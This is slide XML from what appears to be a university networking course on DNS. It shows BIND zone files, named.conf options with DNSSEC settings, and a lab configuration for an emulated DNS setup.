              <a:ext cx="3969"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/dnsuni2/</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20780003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1DA49-DB8F-8DB5-2DDA-0F8D59652F8A}"/>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2DCF5FFF-B6D9-D9D2-17DE-550B42BF32E5}"/>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CFF71402-9B85-097A-5312-59FA8FA9EAB1}"/>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317B63F4-3578-00F0-75C1-873F5AE8E3C9}"/>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2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387A7D00-6D30-A0FF-9D3F-27FB025609E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1866273"/>
            <a:ext cx="7087578" cy="3125454"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1232"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE5269B-47AF-43CB-626A-9B86243B8E8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1174"/>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a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsit.it.    root.dnsit.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120402 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni2.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it. IN  A       110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.uniroma3.it. IN A       100.0.75.10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BE16E1-73FA-0970-56A3-F6517B0075E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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/dnsit/etc/bind/db.it</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12239704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8B596-41F8-7517-54A7-3821A0B9F2E1}"/>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5CB1A639-7285-08CC-F554-08BE9CD2A460}"/>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D24C76B2-B6F5-7D3C-5499-4B6071508851}"/>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190015A4-3E4C-F69E-E1C8-F5D6E6EEB64C}"/>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2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2150856B-EABC-BDC3-5762-113F8B140AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2253149"/>
            <a:ext cx="7087578" cy="2351701"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="927"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C11999-7438-E3B5-9FDF-811C1B7EDA49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="86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a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/</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allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-query { </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>any</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;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recursion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> no;</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dnssec-validation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C952C8-8752-1223-FC5B-4CB16392952A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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/dnsuni2/</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named.conf.options</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10463388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351A8-F72E-B6A0-5A84-203752101FE6}"/>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7EABD080-BA35-66D1-A4AF-2BC6E3428A0A}"/>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F8AC9EA5-9504-6CE5-19B2-EBB67E1E064C}"/>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DFC921DD-E209-B29A-C849-00A0FFA64F29}"/>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2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A67B01-72AE-819D-7009-C505C15615EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1259632"/>
            <a:ext cx="7087578" cy="4338089"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ABEA3D0-9944-9FDF-1B8E-C1B632108CB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="165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a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include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named.conf.options</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zone "."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hint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file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db.root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zone "uniroma3.it"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 master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file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/db.uniroma3";</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dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;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inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</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allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-transfer { 100.0.75.10;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also-notify</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> { 100.0.75.10; }; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED7BD99-D368-2C29-069C-02864D316D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</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655533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ACC28-5F89-FB2C-B356-42DA3D076E7D}"/>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BE3BE5B9-B4B6-26C8-1B46-E9DC7422822A}"/>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D832D241-1064-D0BB-090F-37FF948D126E}"/>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D3FAE4F6-F460-F739-6426-545D34A1718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0C266120-A110-D279-19B3-74354D1403F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1829267"/>
            <a:ext cx="7335694" cy="3199466"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351ABE19-1610-77DB-0D49-0A9BEA3DB8D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0"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wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged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true</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wireshark[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</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linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/wireshark"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[port]="3000:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>num_terms</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41A3171-0B09-7519-9F6F-71507E1E3882}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="8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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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31656160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48596-99A8-577E-8464-5699459624FF}"/>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09668999-D777-9284-A783-43D8B5D1607C}"/>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6B7259DE-5263-105A-BA03-27A15A39C32D}"/>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3D18C480-648A-F72F-9B45-6B0C0ECCA54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2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523FB3B7-B1B3-BA75-DA6E-65720B8E3A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1523600" y="1259632"/>
            <a:ext cx="9144800" cy="4338089"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="7668" cy="1710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC4FFD6-8C0F-BCE3-CFC2-754514012976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="7668" cy="165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a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL    60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsuni.uniroma3.it.    root.dnsuni.uniroma3.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni2.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it.     IN  A   110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.uniroma3.it.    IN  A   100.0.75.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1.uniroma3.it.        IN  A   110.0.0.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2.uniroma3.it.        IN  A   110.0.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>router.uniroma3.it.     IN  A   110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre.uniroma3.it. IN  A   110.0.0.50</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www.uniroma3.it.        IN  CNAME uniromatre.uniroma3.it.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847DC39C-F7C0-E043-E91A-81A3A1A13D74}"/>
                </a:ext>
